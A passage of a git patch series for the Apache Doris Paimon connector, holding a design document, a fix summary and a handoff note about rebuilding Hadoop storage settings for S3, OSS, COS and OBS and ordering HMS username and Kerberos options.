per-subclass**: + `S3Properties` = **50 / 3000 / 1000** (`S3Properties.java:129,136,143`; aliases incl. `AWS_MAX_CONNECTIONS` + etc.), while `OSS/COS/OBS` = **100 / 10000 / 10000**. A single shared default would silently mis-tune S3. +- `OSSProperties` adds Jindo `fs.oss.*`; derives endpoint `oss-[-internal].aliyuncs.com` from region + when blank (`initNormalizeAndCheckProps:277-279` → `getOssEndpoint`, `dlfAccessPublic` default false → + `-internal`). +- `COSProperties.initializeHadoopStorageConfig:177-181`: `fs.cos.impl`=S3AFileSystem, `fs.cosn.impl`=S3AFileSystem, + and **unconditionally** `fs.cosn.bucket.region`, `fs.cosn.userinfo.secretId`, `fs.cosn.userinfo.secretKey`. +- `OBSProperties.initializeHadoopStorageConfig:194-205`: native `fs.obs.impl`/`fs.AbstractFileSystem.obs.impl` + when `org.apache.hadoop.fs.obs.OBSFileSystem` is classpath-available, else `fs.obs.impl`=S3AFileSystem; plus + **unconditional** `fs.obs.access.key`, `fs.obs.secret.key`, `fs.obs.endpoint`. +- **[RT — skeptic 2]** legacy selects exactly ONE backend via `guessIsMe` keyed on **endpoint/uri PATTERN** + (COS=`myqcloud.com`, OBS=`myhuaweicloud.com`), NOT on scheme-prefixed keys. So a `cosn://` catalog + configured with only `s3.endpoint=cos..myqcloud.com` (no `cos.*` key) is a real shape a + scheme-key-only gate would miss. +- `HMSBaseProperties`: `@ConnectorProperty(names={"hive.metastore.username","hadoop.username"})` → + `hiveConf.set(HADOOP_USER_NAME /*="hadoop.username"*/, hmsUserName)` (`:83-87,201-202`). + +## Design + +All changes live in `applyStorageConfig` and its callees. Introduce ONE shared helper and TWO new blocks, +extend the existing two blocks, and fix 4d. The raw `fs./dfs./hadoop.` passthrough stays **last** +(last-write-wins; existing `buildHadoopConfigurationExplicitFsS3aKeyOverridesCanonical` parity). + +### Shared `applyS3aBaseConfig(setter, ak, sk, token, endpoint, region, maxConn, reqTimeout, connTimeout, pathStyle)` +Faithful port of `appendS3HdfsProperties`. **[RT — skeptic 4]** takes the creds AND the tuning as +**explicit caller-resolved params** (each block resolves from its OWN aliases with its OWN defaults — the +helper never re-resolves from props). Emits: +- unconditional: `fs.s3.impl`, `fs.s3a.impl`, `fs.s3{,a}.impl.disable.cache=true`. +- `fs.s3a.endpoint` / `fs.s3a.endpoint.region` — **conditional on `isNotBlank`** (documented deviation: legacy + is unconditional via `checkNotNull`, but the connector has no `setRegionIfPossible` throw-guard; matches the + current connector style). +- creds (gated on `isNotBlank(ak)`, anonymous-safe): `fs.s3a.aws.credentials.provider`=Simple, + `fs.s3a.access.key`, `fs.s3a.secret.key`=`nullToEmpty(sk)`, `fs.s3a.session.token` (if token). +- unconditional tuning: `fs.s3a.connection.maximum`=maxConn, `…request.timeout`=reqTimeout, + `…connection.timeout`=connTimeout, `fs.s3a.path.style.access`=pathStyle. + +### `applyCanonicalS3Config` (P8-2, P9-3, + S3 endpoint-from-region) +Resolve S3 creds (existing aliases). Gate unchanged: `if (ak==null && endpoint==null && region==null) return;` +- **NEW (user-approved)**: `if (endpoint blank && region present) endpoint = "https://s3." + region + ".amazonaws.com";` + (mirrors `S3Properties.getEndpointFromRegion:420`). +- Resolve tuning with **S3 defaults 50/3000/1000** from `{s3.connection.maximum, AWS_MAX_CONNECTIONS}` / + `{s3.connection.request.timeout, AWS_REQUEST_TIMEOUT_MS}` / `{s3.connection.timeout, AWS_CONNECTION_TIMEOUT_MS}`; + pathStyle default `false` from `{use_path_style, s3.path-style-access}`. +- `applyS3aBaseConfig(...)`. + +### `applyCanonicalOssConfig` (P8-1, P8-3) +Resolve OSS creds (existing aliases). Gate unchanged. +- **NEW (4a)**: `if (endpoint blank && region present)` derive + `endpoint = "oss-" + region + (publicAccess ? "" : "-internal") + ".aliyuncs.com"`, where + `publicAccess = toBoolean(firstNonBlank(props, "dlf.access.public", "dlf.catalog.accessPublic"))` (default false). + **[RT — skeptic 3]** this is the SAME derivation as the DLF-local block; therefore **REMOVE** the now-dead + guarded block in `buildDlfHiveConf` (DLF still derives via this shared path; the move also—correctly—grants + the **HMS** flavor the same legacy `OSSProperties.of()` derivation). +- Resolve tuning with **OSS defaults 100/10000/10000** (`{oss.connection.maximum, s3.connection.maximum}` etc.; + pathStyle from `{oss.use_path_style, use_path_style, s3.path-style-access}`). +- **NEW (4a)**: `applyS3aBaseConfig(...)` (emit the S3A base for OSS). +- THEN the existing Jindo `fs.oss.*` block (kept as-is, incl. its existing `isNotBlank` guards — a pre-existing + conditional-vs-unconditional deviation NOT in this fix's scope; after derivation `fs.oss.endpoint` now emits). + +### `applyCanonicalCosConfig` (NEW, 4c) +COS aliases (from `COSProperties`): access `{cos.access_key, s3.access_key, s3.access-key-id, AWS_ACCESS_KEY, +access_key, ACCESS_KEY}`; secret `{cos.secret_key, s3.secret_key, s3.secret-access-key, AWS_SECRET_KEY, +secret_key, SECRET_KEY}`; token `{cos.session_token, s3.session_token, s3.session-token, session_token}`; +endpoint `{cos.endpoint, s3.endpoint, AWS_ENDPOINT, endpoint, ENDPOINT}`; region `{cos.region, s3.region, +AWS_REGION, region, REGION}`. +- **[RT — skeptic 2] Detect** = `anyKeyStartsWith(props, "cos.")` **OR** resolved endpoint contains + `myqcloud.com` **OR** `warehouse` contains `myqcloud.com`. Gate: `if (!detected) return;` +- Tuning defaults 100/10000/10000 (`{cos.connection.*, s3.connection.*}`; pathStyle `{cos.use_path_style, + use_path_style, s3.path-style-access}`). +- `applyS3aBaseConfig(...)` **FIRST** (super-first ordering), THEN **[RT — critic] unconditional**: + `fs.cos.impl`=S3AFileSystem, `fs.cosn.impl`=S3AFileSystem, `fs.cosn.bucket.region`=`nullToEmpty(region)`, + `fs.cosn.userinfo.secretId`=`nullToEmpty(ak)`, `fs.cosn.userinfo.secretKey`=`nullToEmpty(sk)`. + +### `applyCanonicalObsConfig` (NEW, 4c) +OBS aliases (from `OBSProperties`, same shape as COS with `obs.` prefix). Detect = `anyKeyStartsWith(props, +"obs.")` OR resolved endpoint contains `myhuaweicloud.com` OR `warehouse` contains `myhuaweicloud.com`. +- Tuning defaults 100/10000/10000. +- `applyS3aBaseConfig(...)` FIRST, THEN **[RT — skeptic 5(i)]** native-vs-s3a by + `isClassAvailable("org.apache.hadoop.fs.obs.OBSFileSystem")` (`Class.forName(name, false, + PaimonCatalogFactory.class.getClassLoader())` — child-first delegates non-plugin classes to the host parent, + so this answers the same question legacy did): + - native → `fs.obs.impl`=`org.apache.hadoop.fs.obs.OBSFileSystem`, `fs.AbstractFileSystem.obs.impl`=`org.apache.hadoop.fs.obs.OBS`. + - else → `fs.obs.impl`=S3AFileSystem. + - **unconditional**: `fs.obs.access.key`=`nullToEmpty(ak)`, `fs.obs.secret.key`=`nullToEmpty(sk)`, + `fs.obs.endpoint`=`nullToEmpty(endpoint)`. + +### `applyStorageConfig` order +`applyCanonicalS3Config` → `applyCanonicalOssConfig` → `applyCanonicalCosConfig` → `applyCanonicalObsConfig` +→ raw passthrough (last). **[RT — skeptic 1]** when a `cos.*`/`myqcloud` catalog ALSO matches the S3 block +(shared `s3.endpoint`), the COS block runs AFTER S3 so its (identical) S3A base + the `fs.cosn.*` keys win +deterministically — matches legacy, which selects COS for that shape. + +### 4d `buildHmsHiveConf` (P8-4) +Replace `copyIfPresent(props, hiveConf, "hadoop.username")` with +`String u = firstNonBlank(props, "hive.metastore.username", "hadoop.username"); if (isNotBlank(u)) +hiveConf.set("hadoop.username", u);` (alias priority `hive.metastore.username` first; target key +`hadoop.username` == `HADOOP_USER_NAME`). This resolution must run **AFTER** `applyStorageConfig` — the raw +`hadoop.*` passthrough there would otherwise re-copy a literal `hadoop.username` and clobber the resolved +alias (caught by the username-priority test). + +### 4e `buildHmsHiveConf` kerberos-ordering (folded in — pre-existing MAJOR, user-approved 2026-06-12) +Impl-verification (`wf_f90260cb-5e6`) found a **pre-existing** (B1, not introduced by this fix) clobber with +the SAME root cause as 4d: the kerberos block forced `hadoop.security.authentication=kerberos`, but +`applyStorageConfig`'s raw `hadoop.*` passthrough ran AFTER it and re-copied a user-supplied literal +`hadoop.security.authentication=simple` — leaving `auth=simple` with `sasl.enabled=true` (inconsistent +HiveConf, breaks the live GSSAPI handshake) for a **kerberized-HMS + simple-HDFS** catalog. Legacy +`HMSBaseProperties.checkAndInit` runs `initHadoopAuthenticator` LAST, so kerberos is authoritative. **Fix**: +relocate the entire kerberos-conditional block to AFTER `applyStorageConfig` (alongside the 4d username +block), mirroring legacy's ordering. The socket-timeout default + the `hive.*` service-principal stay correct +(neither is a `hadoop.*` passthrough key). User chose to fold this into the FIX-4 commit (same root cause, +same method). + +### New small helpers +`firstNonBlankOrDefault(props, default, keys...)`; `anyKeyStartsWith(props, prefix)`; +`isClassAvailable(className)`; `containsToken(value, token)`. + +## Implementation Plan +1. Add alias-array constants for S3 tuning, OSS tuning, and the full COS/OBS cred + tuning families. +2. Add `applyS3aBaseConfig` + the 4 small helpers. +3. Refactor `applyCanonicalS3Config` (S3 endpoint-from-region + tuning) and `applyCanonicalOssConfig` + (endpoint-from-region + S3A base + tuning) to call the helper. +4. Add `applyCanonicalCosConfig` + `applyCanonicalObsConfig`; wire both into `applyStorageConfig`. +5. Remove the dead DLF-local OSS-endpoint derivation block from `buildDlfHiveConf`. +6. Fix 4d in `buildHmsHiveConf`. +7. Tests (below). Build connector-only; checkstyle; import-gate. + +## Risk Analysis +- **DLF regression** [RT-3]: removing the DLF-local block — DLF still derives via the shared OSS block with the + same `dlf.access.public` source. Verified by the 4 existing DLF tests (must stay green). +- **Existing S3 tests** [RT-4]: all 13 storage tests assert only old keys; new keys are additive, S3 + endpoint-from-region only triggers on a region-only-no-endpoint S3 case (none exist today). Passthrough-last + preserved. +- **Wrong tuning defaults** [RT-critic]: mitigated by per-scheme defaults (50/3000/1000 for S3; 100/10000/10000 + for OSS/COS/OBS) + RED-first divergent-default tests. +- **Over-emission**: COS/OBS emit `fs.s3a.*` for `cosn://`/`obs://` — REQUIRED (those FS impls are S3A and read + `fs.s3a.*`); inert extras (`fs.cosn.*` on an `s3://` catalog) match legacy. +- **Known residual (documented, out of scope)**: OSS endpoint-PATTERN detection (`aliyuncs.com`) is NOT added + (pre-existing gap in the existing OSS block; no failing case; not in the approved cluster). The + conditional-vs-unconditional `fs.s3a.endpoint/region` deviation is documented in a code comment. + +## Test Plan + +### Unit Tests (`PaimonCatalogFactoryTest`) — each is RED-before-GREEN (mutation noted) +- **S3 endpoint-from-region**: region-only S3 (no endpoint) → `fs.s3a.endpoint == https://s3..amazonaws.com`. + Mutation: drop derivation → null. +- **S3 tuning defaults**: S3 catalog (endpoint+region, no conn keys) → `fs.s3a.connection.maximum==50`, + `request.timeout==3000`, `connection.timeout==1000`, `path.style.access==false`. Mutation: shared 100/10000/10000 → red. +- **S3 path-style override**: `use_path_style=true` (and `s3.path-style-access=true`) → `fs.s3a.path.style.access==true`. +- **OSS endpoint-from-region** (filesystem AND hms flavor): `oss.region` only → `fs.oss.endpoint==oss--internal.aliyuncs.com`; + with `dlf.access.public=true` → public form. Mutation: no derivation / wrong public-internal → red. +- **OSS S3A base**: OSS catalog → `fs.s3a.impl==S3AFileSystem` + `fs.s3a.connection.maximum==100`. Mutation: OSS block skips S3A base → red. +- **COS (cos.* keys, `cosn://`)**: `cos.access_key/secret_key/endpoint` → `fs.cosn.impl==S3AFileSystem`, + `fs.cos.impl==S3AFileSystem`, `fs.cosn.userinfo.secretId==ak`, `fs.cosn.userinfo.secretKey==sk`, + `fs.cosn.bucket.region==region`, AND `fs.s3a.endpoint==endpoint` + `fs.s3a.connection.maximum==100`. +- **COS pattern-detect (`s3.endpoint=cos…myqcloud.com`, no `cos.*` key)**: `fs.cosn.impl` present (the gate that a + scheme-key-only design would miss). Mutation: cos.*-key-only gate → fs.cosn.impl null → red. +- **COS unconditional region**: COS catalog with NO region → `fs.cosn.bucket.region` present (`""`, not null). +- **OBS (obs.* keys, `obs://`)**: `obs.access_key/secret_key/endpoint=…myhuaweicloud.com` → `fs.obs.impl` present + (native or s3a), `fs.obs.access.key==ak`, `fs.obs.secret.key==sk`, `fs.obs.endpoint==endpoint`, AND S3A base. +- **OBS pattern-detect (`s3.endpoint=…myhuaweicloud.com`, no `obs.*` key)**: `fs.obs.impl` present. +- **4d HMS username alias**: `hive.metastore.username=foo` (no `hadoop.username`) → `hadoop.username==foo`. + Mutation: only literal-copy → null. Priority: both set → `hive.metastore.username` wins (this test caught a + real ordering bug: the username resolution had to move AFTER the storage overlay or the raw `hadoop.*` + passthrough clobbers it). +- **4e kerberos survives simple-HDFS passthrough**: `hive.metastore.authentication.type=kerberos` + + `hadoop.security.authentication=simple` → `hadoop.security.authentication==kerberos` + `sasl.enabled==true`. + Mutation: kerberos block before the storage overlay → clobbered to `simple` → red. +- **DLF unchanged**: existing 4 DLF tests stay green (regression guard for the block removal). + +### E2E Tests +None added. Live coverage exists in `paimon_base_filesystem.groovy` (catalog_oss/cos/cosn/obs) + +`test_paimon_dlf_catalog.groovy` + `test_paimon_hms_catalog.groovy`, all CI-gated (`enablePaimonTest=false`). +Note as gated; do not claim executed. From 05a56e038ff979f116d8d93cb8be27120e795fc3 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 20:18:55 +0800 Subject: [PATCH 043/128] =?UTF-8?q?docs:=20roll=20HANDOFF=20+=20task-list?= =?UTF-8?q?=20=E2=80=94=20FIX-4=20(FIX-FECONF-STORAGE-PARITY)=20done;=20al?= =?UTF-8?q?l=204=20round-3=20fixes=20complete,=20next=20B8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Mark FIX-4 done (commit f0210b51871) in task-list-P5-rereview3-fixes.md; record the beyond-literal-scope items (user-approved S3 endpoint-from-region, per-backend tuning defaults, endpoint-pattern detection, unconditional fs.cosn.*/fs.obs.*, folded-in 4e kerberos-ordering MAJOR) and the known out-of-scope residual. - Add FIX-FECONF-STORAGE-PARITY-summary.md. - Roll HANDOFF: all 4 user-approved round-3 fixes (FIX-1..FIX-4) complete; next session = B8 legacy deletion (paimon/* + *Properties dead residue, now that FIX-4 no longer needs them as a literal-port reference) + round-3 follow-ups (D-057 re-scope, accepted-deviation sign-off, uncheckedFallbacks), gated on an AskUserQuestion scope check since B8 is a large change. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/FIX-FECONF-STORAGE-PARITY-summary.md | 53 ++++++++ plan-doc/HANDOFF.md | 122 +++++++++--------- plan-doc/task-list-P5-rereview3-fixes.md | 15 ++- 3 files changed, 126 insertions(+), 64 deletions(-) create mode 100644 plan-doc/FIX-FECONF-STORAGE-PARITY-summary.md diff --git a/plan-doc/FIX-FECONF-STORAGE-PARITY-summary.md b/plan-doc/FIX-FECONF-STORAGE-PARITY-summary.md new file mode 100644 index 00000000000000..350cb8d2fa0da8 --- /dev/null +++ b/plan-doc/FIX-FECONF-STORAGE-PARITY-summary.md @@ -0,0 +1,53 @@ +# FIX-FECONF-STORAGE-PARITY — summary + +**Commit**: `f0210b51871` (fix). Cluster P8-1/P8-2/P8-3/P8-4 + P9-2/P9-3 + user-approved S3 +endpoint-from-region + folded-in pre-existing kerberos-ordering MAJOR. **Connector-only** (no fe-core / SPI / BE). + +## Problem +`PaimonCatalogFactory` rebuilds the FE-side Hadoop `Configuration` / `HiveConf` from raw props (the connector +cannot import fe-core), but the reconstruction was incomplete vs the legacy `*Properties`. Paimon catalogs on +OSS (region-only / s3://-over-OSS), COS, OBS, and MinIO/path-style failed FE-side catalog/metadata access; the +HMS `hive.metastore.username` alias never reached `hadoop.username`. + +## Root Cause +`applyStorageConfig` ran only `applyCanonicalS3Config` + `applyCanonicalOssConfig`, each emitting a subset of +the legacy `initializeHadoopStorageConfig` (+ `super.appendS3HdfsProperties`) keys, with no COS/OBS block. +Notably the 4 S3A tuning keys were never emitted, the OSS endpoint-from-region derivation was DLF-local only, +and the HMS username alias was dropped. + +## Fix +- Shared `applyS3aBaseConfig` helper (port of `appendS3HdfsProperties`) taking caller-resolved creds + tuning. +- **4a OSS**: endpoint-from-region (`oss-[-internal].aliyuncs.com`, default `-internal`) moved into the + shared OSS block (so filesystem + hms flavors get it); emit the S3A base for OSS; removed the dead DLF-local block. +- **4b S3**: `fs.s3a.path.style.access` + `connection.maximum/request.timeout/timeout`, with **per-backend + defaults** — S3 `50/3000/1000` (+ `AWS_*` alias twins), OSS/COS/OBS `100/10000/10000`. +- **4c COS/OBS**: new blocks. Detection = `cos.`/`obs.` key OR endpoint/warehouse pattern + (`myqcloud.com`/`myhuaweicloud.com`), mirroring legacy `guessIsMe`. Each emits the S3A base (the cosn/obs FS + impl is `S3AFileSystem`, which reads `fs.s3a.*`) then the **unconditional** `fs.cosn.*` / `fs.obs.*` keys; OBS + prefers native `OBSFileSystem` when classpath-available. +- **S3 endpoint-from-region** (user-approved): region-only AWS S3 → `https://s3..amazonaws.com`. +- **4d HMS username**: `firstNonBlank(hive.metastore.username, hadoop.username)` → `hadoop.username`, run AFTER + the storage overlay so the raw `hadoop.*` passthrough can't clobber it. +- **4e kerberos-ordering** (folded-in pre-existing MAJOR): relocated the kerberos-conditional block to run AFTER + the storage overlay, so a kerberized-HMS + simple-HDFS catalog keeps `auth=kerberos` (legacy + `initHadoopAuthenticator`-last) instead of being clobbered to `simple` while `sasl.enabled=true`. + +## Tests +`PaimonCatalogFactoryTest` **56/0/0** (15 new). The username-priority and kerberos-survives-simple-HDFS tests +are RED on the pre-move ordering (proof of fail-before; the kerberos clobber was empirically reproduced in +impl-review). Full `fe-connector-paimon` module green; checkstyle 0; import-gate clean. Live e2e +(`paimon_base_filesystem` catalog_oss/cos/cosn/obs, `test_paimon_dlf_catalog`, `test_paimon_hms_catalog`) +CI-gated (`enablePaimonTest=false`) — not run here. + +## Method (meta) +Design red-team `wf_a6385c61-669` (5 skeptics + completeness critic) BEFORE coding caught: divergent per-backend +tuning defaults (S3 50/3000/1000 vs 100/10000/10000), endpoint-pattern detection (legacy detects COS/OBS by +endpoint pattern, not scheme key), and the unconditional `fs.cosn.*`/`fs.obs.*` requirement. Impl verification +`wf_f90260cb-5e6` confirmed byte-for-byte legacy key/alias/default fidelity (CLEAN) and surfaced the pre-existing +kerberos-ordering MAJOR (4e), which the user approved folding in. + +## Result +All 4 round-3 user-approved fixes (FIX-1..FIX-4) complete. No fe-core/SPI/BE change. Known residual (documented, +out of scope): OSS endpoint-PATTERN detection (`aliyuncs.com`) not added to the existing OSS block (pre-existing, +no failing case); `fs.s3a.endpoint/region` emitted conditionally (connector lacks legacy's `checkNotNull` +throw-guard). diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 01be645a1b990f..539cdbaa813a0d 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,70 +5,67 @@ --- -# 🎯 下一个 session 的任务 — **FIX-4 `FIX-FECONF-STORAGE-PARITY`(FE-config FULL legacy parity)** +# 🎯 下一个 session 的任务 — **B8 legacy 删除 + round-3 follow-ups(先 AskUserQuestion 定 scope)** -第三轮 clean-room 对抗 review 转出 4 个 user-approved fix([`task-list-P5-rereview3-fixes.md`](./task-list-P5-rereview3-fixes.md))。 -**FIX-1 / FIX-2 / FIX-3 已完成并各自独立 commit**;剩 **FIX-4**。每步走 `step-by-step-fix` skill -(design doc → impl → tests → **独立 commit**),design 前建议跑对抗 red-team(FIX-1/FIX-3 亲证有效)。 +**第三轮 clean-room 对抗 review 转出的 4 个 user-approved fix 已全部完成并各自 commit** +([`task-list-P5-rereview3-fixes.md`](./task-list-P5-rereview3-fixes.md))。无剩余已批准 fix。 +下一步是清尾工作,**开工前先 `AskUserQuestion` 确认要做哪一项**(B8 删除是大动作): -## ✅ 已完成(本 session) -- **FIX-3 `FIX-INCR-SCAN-RESET`(P2-1 MAJOR)— commit `f08bc22b9bd`**。@incr 不再因基表持久化的 - stale `scan.snapshot-id`/`scan.mode` 而崩/丢行。**Option 2**:`validate()` 保持 null-free(共享 - `ConnectorMvccSnapshot` SPI 不进 null);两个 null reset 在唯一 `Table.copy` chokepoint - `PaimonScanPlanProvider.resolveScanTable` 经新 `PaimonIncrementalScanParams.applyResetsIfIncremental` - 重新施加(覆盖 native + JNI 两 caller)。paimon `copyInternal` 把 null 当 `options.remove(k)`。 - gate=`incremental-between`/`-timestamp` 存在性(真 snapshot/tag pin 原样放行);严格 legacy parity - 只 reset 两键。**实测失败态是 `copy()` 硬抛 `IllegalArgumentException`(非仅静默丢行)**;real-table 测 - proven fail-before/pass-after。design red-team `wf_ffd11631-ed2`(DESIGN-SOUND)。 - 验证:连接器 20/44/37 绿;checkstyle 0;import-gate 干净。设计/总结见 - `FIX-INCR-SCAN-RESET-design.md` + `-summary.md`。 +1. **B8 legacy 删除**(task-list Follow-ups + 第三轮报告 R-1…R-8):legacy `fe/fe-core/.../datasource/paimon/*` + + `datasource/property/storage/{OSS,COS,OBS,S3,Minio}Properties`、`property/metastore/HMSBaseProperties` 等是 + dead residue。**删除前提**:FIX-4 不再需要它们作 literal 复刻对照(现已 commit,对照完成 → 可删)。 + **删除须保 load-bearing dispatch ordering**(`ShowPartitionsCommand:478-480`,R-4)。逐子树删 + 每删一批跑 + fe-core 编译 + 连接器测 + 全量 regression-gated。 +2. **D-057 re-scope**(报告 §D.3):deferred 的 `TablePartitionValues:162` prune-path sentinel residue **不影响 + paimon**(MVCC override 绕过)。把 deferral re-scope 到 **非-MVCC** 插件连接器(maxcompute/es/jdbc); + base-class DATE-epoch + HIVE_DEFAULT 路(P11-1/P11-2)是那边的隐患,非 paimon。 +3. **accepted-deviation 用户签字**(task-list「NOT in this fix scope」§):~10 MINOR + ~12 NIT + C-1 + observability + uncheckedFallbacks(REFRESH cache invalidation / partitions-TVF auth / split-plan RPC 在 + `executeAuthenticated` 外 / `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常)。逐条让用户 + accept-as-deviation 或转 fix。 -## 📋 待修清单(详见 task-list) -4. **FIX-4 `FIX-FECONF-STORAGE-PARITY`**(cluster P8-1/2/3/4·P9-2/3,用户定 **FULL legacy parity**)— - `PaimonCatalogFactory.buildHadoopConfiguration` 从 raw props 重建 Configuration 不全(filesystem/jdbc/HMS - flavor → catalog/metadata 访问在缺失 backend 上失败)。**连接器 only(禁 import fe-core,literal 复刻 - legacy 键逻辑,同既有 `applyCanonical*` 模式)**。拆 **4 独立 commit**(也可单 commit): - - **4a `FIX-FECONF-OSS`**(P8-1/P8-3):endpoint 缺省时由 region 推 `fs.oss.endpoint` - (`oss-[-internal].aliyuncs.com`,ref legacy `OSSProperties.getOssEndpoint:277-279,314-326`)+ 补 OSS 的 S3A 键(`fs.s3.impl`/`fs.s3a.*`)。 - - **4b `FIX-FECONF-S3`**(P8-2/P9-3):由 `use_path_style`/`s3.path-style-access` 出 `fs.s3a.path.style.access` + conn/timeout 键(MinIO/path-style)。 - - **4c `FIX-FECONF-COS-OBS`**(P9-2):加 `cos.*`/`obs.*` alias 数组 + 出 COS 键(`fs.cosn.impl`/`fs.cosn.userinfo.secretId|secretKey`/`fs.cosn.bucket.region`,ref `COSProperties:174-182`)+ OBS 键(`fs.obs.impl`/`fs.AbstractFileSystem.obs.impl`/`fs.obs.access.key|secret.key`,ref `OBSProperties:194-204`)。 - - **4d `FIX-FECONF-HMS-USER`**(P8-4):`buildHmsHiveConf` 出 `hive.metastore.username` alias(映 `hadoop.username`)。 - 测试 `PaimonCatalogFactoryTest`:每 backend 一例(region-only OSS→`fs.oss.endpoint`;COS→`fs.cosn.*`; - OBS→`fs.obs.*`;S3 path-style;HMS username alias)。**Build:连接器 only**。 - -## ⚠️ 关键结论(修复时参照,**勿当先验压制新发现**) -- **P11-1(DATE-epoch prune)是假 BLOCKER**:paimon 走 `PluginDrivenMvccExternalTable.getNameToPartitionItems` - override(解析 rendered name),不走 base raw-epoch 路 → D-057 的「prune-路 paimon 残留」框定有误, - **B8 时 re-scope 到非-paimon 连接器**(task-list Follow-ups)。 -- 翻闸结构性 OK(R-1…R-8)。legacy `datasource/paimon/*` = dead residue,**B8 删除放最后**;FIX-4 期间仍需 - legacy `*Properties`(`OSSProperties`/`COSProperties`/`OBSProperties`/`HMSBaseProperties`)作 literal 复刻对照。 +## ✅ 已完成(本 session)— **FIX-4 `FIX-FECONF-STORAGE-PARITY`(cluster P8-1..4·P9-2/3)— commit `f0210b51871`** +- **连接器 only**(`PaimonCatalogFactory`,无 fe-core/SPI/BE)。FE-side Hadoop `Configuration`/`HiveConf` 重建 + 补齐到 legacy full parity:4a OSS endpoint-from-region(移入共享 OSS 块,删 DLF-local 死块)+ S3A base; + 4b S3 path-style + 4 个 tuning 键(**per-backend 默认**:S3 `50/3000/1000` + `AWS_*` twins,OSS/COS/OBS + `100/10000/10000`);4c 新 COS/OBS 块(**endpoint-PATTERN 检测** `myqcloud.com`/`myhuaweicloud.com` OR + scheme 键;S3A base + **无条件** `fs.cosn.*`/`fs.obs.*`;OBS native-vs-s3a by classpath);**user-approved** + S3 endpoint-from-region;4d HMS username alias(`hadoop.username`,移到 storage overlay 之后避 passthrough + clobber);**4e folded-in pre-existing MAJOR**:kerberos 块移到 overlay 之后(kerberized-HMS + simple-HDFS + 否则被 clobber 成 `auth=simple`+`sasl=true` 坏 GSSAPI)。 +- **meta(本 session 亲证有效,下次照用)**:① **design red-team 在写码前**(`wf_a6385c61-669`,5 skeptic + + completeness critic)抓出三处会 ship-wrong 的 framing:tuning 默认非均一、COS/OBS 按 endpoint pattern 检测 + 非 scheme-key、`fs.cosn.*`/`fs.obs.*` 无条件发;② **impl verification 在写码后**(`wf_f90260cb-5e6`)逐键 diff + legacy(fidelity CLEAN)+ 揪出 4e pre-existing MAJOR;③ **测试钉真不变式**:username-priority + kerberos 两个 + 新测在旧 ordering 是 RED(抓出 raw `hadoop.*` passthrough clobber authoritative 设置)。 +- 验证:连接器 56/0/0 + 全模块绿;checkstyle 0;import-gate 干净。live-e2e CI-gated(注明 gated,未谎称跑过)。 + 设计/总结:`FIX-FECONF-STORAGE-PARITY-design.md` + `-summary.md`。 ## 🗺️ 代码脚手架 - **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/` - (**flavor/存储装配 `PaimonCatalogFactory.java`[FIX-4]**:`buildHadoopConfiguration:390-394`、 - `applyStorageConfig:412-426`、`applyCanonicalS3Config:437-465`、`applyCanonicalOssConfig:475-499`、 - alias 数组 `:87-106`、`buildHmsHiveConf`;scan `PaimonScanPlanProvider.java`+`PaimonScanRange.java`; + (存储装配 `PaimonCatalogFactory.java`:`applyStorageConfig`→`applyCanonicalS3/Oss/Cos/ObsConfig` + + 共享 `applyS3aBaseConfig`;`buildHmsHiveConf`/`buildDlfHiveConf`;scan `PaimonScanPlanProvider.java`; @incr `PaimonIncrementalScanParams.java`)。`-api`/`-backend-*` 模块在 git 内为空壳。 - **fe-core 桥/SPI**:`fe/fe-core/.../connector/DefaultConnectorContext.java`、`.../datasource/PluginDriven*.java`; SPI `fe/fe-connector/fe-connector-{api,spi}/`。 -- **Legacy 对照基准(仍在树内,勿删;FIX-4 literal 复刻源)**:`fe/fe-core/.../datasource/property/storage/` - 下 `OSSProperties`/`COSProperties`/`OBSProperties`/`HMSBaseProperties`(grep 确认实际路径); - `fe/fe-core/.../datasource/paimon/`(`source/PaimonScanNode.java`、`PaimonUtil.java`、 - `PaimonRestMetaStoreProperties` 等)。 +- **Legacy 对照基准(B8 删除目标)**:`fe/fe-core/.../datasource/paimon/`、`.../datasource/property/storage/` + 下 `{OSS,COS,OBS,S3,Minio}Properties`、`.../property/metastore/HMSBaseProperties`。**FIX-4 已 commit → 对照 + 完成,B8 可删。** - **BE 消费端**:`be/src/format/table/`(`paimon_cpp_reader.cpp`、`paimon_reader.cpp`、`partition_column_filler.h`)。 --- # 📦 仓库状态 -- **HEAD = `f08bc22b9bd`(FIX-3)**。迁移链:…→`c376aba1264`(FIX-1)→`2e845e88bf9`(FIX-2)→ - `1b2b4236db3`(docs)→**`f08bc22b9bd`(FIX-3, HEAD)**。本 session 后另有一个 `docs:` 提 - (滚 HANDOFF + task-list 勾 FIX-3 + 加 `FIX-INCR-SCAN-RESET-summary.md`)。 +- **HEAD = `f0210b51871`(FIX-4)**。迁移链:…→`c376aba1264`(FIX-1)→`2e845e88bf9`(FIX-2)→`f08bc22b9bd`(FIX-3) + →`d4aeaaccc45`(docs)→**`f0210b51871`(FIX-4, HEAD)**。本 session 后另有一个 `docs:` 提 + (滚 HANDOFF + task-list 勾 FIX-4 + 加 `FIX-FECONF-STORAGE-PARITY-summary.md`)。 - ⚠️ `regression-test/conf/regression-conf.groovy` 仍 modified 未 commit 且含**明文 Aliyun key** —— commit 前继续 path-whitelist,**严禁 `git add -A`**;`regression-conf.groovy.bak` 同理排除。 - 未 commit/未跟踪:scratch(`.audit-scratch/` `conf.cmy/` `META-INF/`); `plan-doc/reviews/P5-paimon-rereview3-2026-06-12.md`(第三轮 review 报告,未跟踪——大文件,下次方便时 vet+commit 或保留本地)。 -- 当前分支 `catalog-spi-07-paimon`(非 `master`)。**无 P0~P4 阻塞遗留**;P9-1 BLOCKER 已清;P2-1 已清。 +- 当前分支 `catalog-spi-07-paimon`(非 `master`)。**P0~P4 无阻塞;P9-1/P7-1/P2-1 + P8/P9-config 全清。** + round-3 的 4 个 user-approved fix 全部完成。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` @@ -79,26 +76,25 @@ ## ⚙️ 操作须知(复用) - maven 绝对 